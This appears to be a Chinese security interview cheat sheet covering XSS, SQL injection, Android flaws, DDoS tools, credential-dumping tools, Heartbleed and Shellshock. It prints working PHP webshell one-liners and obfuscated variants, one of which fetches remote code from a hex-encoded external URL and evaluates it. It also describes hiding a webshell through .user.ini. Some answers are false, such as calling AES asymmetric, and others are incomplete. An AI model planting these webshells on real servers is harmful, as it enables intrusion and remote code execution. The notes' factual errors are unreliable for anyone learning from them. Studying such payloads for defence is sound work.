本文的笔试题答案来自百度、谷歌,笔者只是知识的搬运工,如有错误欢迎大家批评指正!!
xss的危害
xss攻击过程大致如下:攻击者的Html输入—>web程序—>进入数据库—>web程序—>用户浏览器,攻击者在远程web页面的html代码中插入具有恶意目的的数据,用户认为该页面是可信的,但浏览器下载该页面时,嵌入其中的脚本将被解释执行。
防范方法:过滤"<>","&","=","","""",ReplaceR(str,"<","<"),Replace(str,">",">")
获取域名DNS记录的命令:nslookup,dig
php避免sql注入的函数:addslashes用于处理单字节的,mysql_real_escape_string可用于处理多字节,且只能用在(php5以上 or php4>=4.3.0)版本,否则只能用mysql_escape_string,magic_quotes_gpc只有在页面传递 $_GET,$_POST,$_COOKIE 时才会发生作用,主动进行调用,在web客户端执行.
android开发中哪些习惯会导致安全漏洞:
a.数据存储:将隐私数据明文保存在外部存储,将系统数据明文保存在外部存储,将软件运行时依赖的数据保存在外部存储,将软件安装包或者二进制代码保存在外部存储,全局可读写的内部文件,内部敏感文件被root权限软件读写
b.网络通信:不加密地明文传输敏感数据,SSL通信不检查证书有效性(可能造成中间人攻击),使用短信注册账户或接收密码
c.密码和认证策略:明文存储和编码存储密码,对外服务的弱密码或固定密码,使用IMEI或IMSI作为唯一认证凭据
cc攻击:模拟多个用户不停地访问那些需要大量数据操作的页面,造成服务器资源的浪费,导致cpu长期处在100%,永远有处理不完的连接,造成网络阻塞。分为直接攻击,代理攻击,僵尸网络攻击。当遭遇cc攻击时,应对手段:取消域名绑定,域名欺骗解析,更改web端口,IIS屏蔽ip
常见PHP“一句话木马”:<?php eval($_POST[CMD]);?> or <?php eval($_GET[CMD]);?>
变种:
<?php $x=$_GET[‘z’];@eval(“$x;”);?>,$a=str_replace(x,””,”axsxxsxexrxxt”);$a($_POST[“code”]);,
$_GET[‘a’]($_GET[‘b’]);,
($code = $_POST['code’])&&@preg_replace(‘/ad/e’,’@’.str_rot13(‘riny’).'($code)’, ‘add’);,
$filename=$_GET[‘code’];include ($filename);,
上传.user.ini,并且写入auto_prepend_file=code.gif 将一句话隐藏在code.gif中,并且将它上传到同一目录下,if(empty($_SESSION[‘api’]))$_SESSION[‘api’]=substr(file_get_contents(sprintf(‘%s? %s’,pack(“H*”,’687474703a2f2f377368656c6c2e676f6f676c65636f64652e636f6d2f73766e2f6d616b652e6a7067′),uniqid())),3649);@preg_replace(“~(.*)~ies”,gzuncompress($_SESSION[‘api’]),null);
nmap 10.5.5.5.1 默认的扫描端口:没明白什么意思!
android manifest.xml什么配置使内部文件被盗?
自动化web漏洞扫描工具有哪些:nikito,paros proxy,webscarab,webinspect,owasp zap,burpsuite,IBM security appscan,acunetix web vulnerability scanner,safe3 scanner,n-stealth
http数据抓包工具:各浏览器自带的浏览器,wireshark,fiddler等等
AES加密:非对称加密,其他的还有RSA,Elgamal算法等
哪些工具可以抓取windows的明文密码:mimikatz 2.0,wce 1.42 beta,fgdump 2.10,powermemory-RWMC
哪些服务器存在文件解析漏洞:详情可见http://drops.wooyun.org/papers/539
DDOS攻击工具:LOIC,XOIC,HULK,DDOSIM-layer,R-U-Dead-Yet,Tor';hammer,PyLoris,OWASP DOS HTTP POST,DAVOSET,黄金眼http拒绝服务工具
拦截修改http数据包的工具:pproxy,fiddler,charles
如何大批量获取网站注册用户身份信息?
xcodeghost,wormhole,心脏滴血,shellshock的危害
xcodeghost:xcode带有coreservice库文件,编译出来的app就会被ghost感染。会手机iphone以及app的一些基本信息,比如系统版本,语言,国家,应用名称等等,但代码本身并无恶意。
wormhole:无论是wifi还是3g/4g网络,只要是联网情况下都有可能遭受攻击。且此漏洞只和app有关,不受系统版本影响。
心脏滴血:这是一个出现在加密程序库openSSL的程序错误,原因是在实现TLS的心跳扩展时没有对输入进行适当的验证(缺少便捷检查),属于缓冲区过读错误,即可读的数据比应该允许读取的数据多。每次心跳中暴露客户端与服务器通信中的64k内存。
shellshock(破壳):bash4.3及以前的版本在处理某些构造的环境变量时存在安全漏洞,向环境变量值内的函数定义后添加多余的字符串,攻击者可通过此漏洞绕过或改变环境限制,以执行任意的shell命令甚至完全控制目标系统。
CSRF(跨站请求伪造):通过伪造身份来提交post和get请求来完成跨域的攻击
Android应用http中间人攻击原因:详见http://jaq.alibaba.com/blog.htm?id=60
linux下查看ssh登录历史记录命令:less secure,linux下登录日志在/var/log中
访问web网站的某资源不存在,返回http的状态码是:404
ASLR(地址随机化)是对抗缓冲区溢出攻击的技术。
“xss终结者”使用HTTP头部来限制资源的策略是:CSP(content security policy)
win下查看系统用户列表的命令:whoami /all
sql(mysql)注入常用延时函数:benchmark
Redis默认端口:6379
网站被上传了webshell如何处理?